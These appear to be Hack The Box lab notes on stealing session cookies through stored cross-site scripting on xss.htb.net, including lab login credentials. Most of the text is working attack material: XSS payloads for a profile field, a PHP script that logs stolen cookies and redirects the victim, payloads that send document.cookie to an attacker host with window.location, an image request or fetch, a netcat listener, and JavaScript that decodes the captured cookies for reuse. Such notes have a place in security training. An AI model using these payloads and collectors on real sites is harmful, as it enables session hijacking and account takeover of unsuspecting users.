XSS vulnerabilities allow attackers to execute arbitrary JavaScript in a victim's browser. For an XSS to leak the session cookie, two conditions must hold:
- The application must authenticate the user with a session cookie that the browser attaches to every request, so that possessing the cookie is enough to hijack the session
- The cookie must lack the HttpOnly attribute; with HttpOnly set, document.cookie cannot read it and the payloads below return nothing useful
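The second precondition is the one you can check from a response before writing any payload. The following is an added example, not code from the original page: it parses Set-Cookie headers and reports which session-looking cookies are readable from JavaScript (no HttpOnly) and which other attributes they are missing. The sample headers and the cookie names are constructed for illustration; they are not values observed on xss.htb.net, and the name hints used to pick out session cookies are an assumption.

```javascript
// Added example (not from the original page): audit Set-Cookie headers for the
// attributes that decide whether an XSS can read the session cookie.
// Sample headers and cookie names below are constructed for illustration.

// Substrings that usually mark a session-carrying cookie (assumption).
const SESSION_NAME_HINTS = ['sess', 'sid', 'auth', 'token', 'login'];

// Parse one Set-Cookie header value into its name, value and attribute map.
// Attribute keys are lower-cased because browsers match them case-insensitively.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq);
  const value = eq === -1 ? '' : parts[0].slice(eq + 1);
  const attrs = {};
  for (const attr of parts.slice(1)) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return { name, value, attrs };
}

// Return one finding per session-looking cookie: whether document.cookie can
// read it (no HttpOnly) and which of HttpOnly / Secure / SameSite are absent.
// Secure and SameSite are reported too, because a cookie an XSS can read is
// rarely the only thing wrong with it.
function auditSetCookies(headers) {
  const findings = [];
  for (const h of headers) {
    const c = parseSetCookie(h);
    const lower = c.name.toLowerCase();
    if (!SESSION_NAME_HINTS.some((hint) => lower.includes(hint))) continue;
    const missing = [];
    if (!('httponly' in c.attrs)) missing.push('HttpOnly');
    if (!('secure' in c.attrs)) missing.push('Secure');
    if (!('samesite' in c.attrs)) missing.push('SameSite');
    findings.push({ name: c.name, exposedToXss: !('httponly' in c.attrs), missing });
  }
  return findings;
}

// Constructed sample: the first cookie is what an HttpOnly-off lab setup looks
// like, the second is the hardened form, the third is not a session cookie.
const SAMPLE_HEADERS = [
  'session=eyJ1c2VyIjoiY3Jhenlnb3JpbGxhOTgzIn0; Path=/',
  'auth_token=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/',
];

for (const f of auditSetCookies(SAMPLE_HEADERS)) {
  console.log(`${f.name}: readable from JS = ${f.exposedToXss}; missing: ${f.missing.join(', ') || 'nothing'}`);
}
```

Feed it the Set-Cookie values from the login response (Developer Tools, Network tab, or a proxy). A cookie flagged exposedToXss is the one the payloads in the rest of these notes will be able to steal.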
XSS Payload Testing
Login: crazygorilla983 / pisces at http://xss.htb.net
Test payloads in profile fields:
"><img src=x onerror=prompt(document.domain)>
"><img src=x onerror=confirm(1)>
"><img src=x onerror=alert(1)>
After saving, use the "Share" functionality to open the public profile. The payload placed in the Country field fires when the public profile is viewed. Confirm that HttpOnly is off on the session cookie (Developer Tools, Application > Cookies shows the HttpOnly column); if it were set, document.cookie would not return it.
Cookie Stealing with PHP Logging Script
log.php:
<?php
// Append whatever arrives in the "c" parameter to a local log file.
$logFile = "cookieLog.txt";
$cookie = isset($_REQUEST["c"]) ? $_REQUEST["c"] : "";
$handle = fopen($logFile, "a");
fwrite($handle, $cookie . "\n\n");
fclose($handle);
// Send the victim on to an unremarkable page so the redirect draws little attention.
header("Location: http://www.google.com/");
exit;
?>
Start PHP server:
php -S <VPN/TUN Adapter IP>:8000
Payload for Country field:
<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://<VPN/TUN Adapter IP>:8000/log.php?c=' + document.cookie;"></video>
Simulate the victim:
- Log in as smallfrog576 / guitars
- Visit http://xss.htb.net/profile?email=ela.stienen@example.com
The cookie appears in PHP server logs and is saved to cookieLog.txt.
Cookie Stealing with Netcat
Payload:
<h1 onmouseover='document.write(`<img src="http://<VPN/TUN Adapter IP>:8000?cookie=${btoa(document.cookie)}">`)'>test</h1>
Start Netcat listener:
nc -nlvp 8000
When the victim hovers over "test", Netcat prints the raw request and the base64-encoded cookie sits in its request line. Netcat never answers, so the victim's image request just hangs, which does not matter for the exfiltration. Decode the value in the browser console with:
atob("base64_string")
Stealthier Fetch Payload (No Redirect)
<script>fetch(`http://<VPN/TUN Adapter IP>:8000?cookie=${btoa(document.cookie)}`)</script>
The request is sent even though the cross-origin response cannot be read, and the victim stays on the page. Caveat: a <script> tag only executes when the browser parses it as part of the page; if the application inserts the stored value with innerHTML, the script will not run and an event-handler payload such as the <img onerror> or <video onanimationend> ones above is needed instead.
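Both listener variants above leave you reading a raw request line and decoding by hand. The following is an added example, not code from the original page: it takes a raw HTTP request as Netcat shows it and recovers the cookies for both payload shapes used in these notes, ?c=<url-encoded cookie> (the log.php payload) and ?cookie=<base64 of document.cookie> (the Netcat and fetch payloads). The sample request, the listener address 10.10.14.5 and the cookie values are constructed; it runs under Node and uses only globals, no modules.

```javascript
// Added example (not from the original page): decode the exfiltrated cookie
// from a raw HTTP request captured by the netcat listener. Handles
//   ?c=<url-encoded document.cookie>        (the PHP log.php payload)
//   ?cookie=<base64 of document.cookie>     (the netcat and fetch payloads)
// The sample request and cookie values below are constructed.

// Percent-decode a value, returning it unchanged if the escapes are malformed.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Split the query string by hand instead of using URLSearchParams, which turns
// '+' into a space; btoa() output legitimately contains '+', so that would
// corrupt the base64 before we decode it.
function rawQueryParams(target) {
  const q = target.indexOf('?');
  const params = {};
  if (q === -1) return params;
  for (const pair of target.slice(q + 1).split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    const val = eq === -1 ? '' : pair.slice(eq + 1);
    params[safeDecode(key)] = safeDecode(val);
  }
  return params;
}

// The request target is the second field of the request line.
function requestTarget(rawRequest) {
  const firstLine = rawRequest.split(/\r?\n/)[0] || '';
  const fields = firstLine.split(' ');
  return fields.length >= 2 ? fields[1] : '';
}

// Parse a document.cookie string ("a=1; b=2") into a name -> value map.
function parseCookieString(cookieString) {
  const cookies = {};
  for (const part of cookieString.split(';')) {
    const t = part.trim();
    if (!t) continue;
    const eq = t.indexOf('=');
    cookies[eq === -1 ? t : t.slice(0, eq)] = eq === -1 ? '' : t.slice(eq + 1);
  }
  return cookies;
}

// Return { source, cookies } or null if neither parameter is present.
// Spaces are restored to '+' in case a proxy or server already mangled the
// base64; Buffer's decoder tolerates missing '=' padding.
function decodeExfilRequest(rawRequest) {
  const params = rawQueryParams(requestTarget(rawRequest));
  if (params.cookie !== undefined) {
    const b64 = params.cookie.replace(/ /g, '+');
    const cookieString = Buffer.from(b64, 'base64').toString('utf8');
    return { source: 'base64', cookies: parseCookieString(cookieString) };
  }
  if (params.c !== undefined) {
    return { source: 'plain', cookies: parseCookieString(params.c) };
  }
  return null;
}

// Constructed sample: what netcat shows when the fetch payload fires with
// document.cookie === 'session=abc123; theme=dark'.
const SAMPLE_FETCH_REQUEST = [
  'GET /?cookie=c2Vzc2lvbj1hYmMxMjM7IHRoZW1lPWRhcms= HTTP/1.1',
  'Host: 10.10.14.5:8000',
  'Origin: http://xss.htb.net',
  'Referer: http://xss.htb.net/profile?email=ela.stienen@example.com',
  '',
  '',
].join('\r\n');

// Constructed sample: the same cookie leaving via the log.php redirect payload,
// with the browser having percent-encoded the space.
const SAMPLE_PLAIN_REQUEST =
  'GET /log.php?c=session%3Dabc123;%20theme%3Ddark HTTP/1.1\r\nHost: 10.10.14.5:8000\r\n\r\n';

console.log(decodeExfilRequest(SAMPLE_FETCH_REQUEST));
console.log(decodeExfilRequest(SAMPLE_PLAIN_REQUEST));
```

Paste the request block Netcat printed into decodeExfilRequest, or pipe the listener's output through it; the result is the cookie map ready to drop into the browser's cookie store.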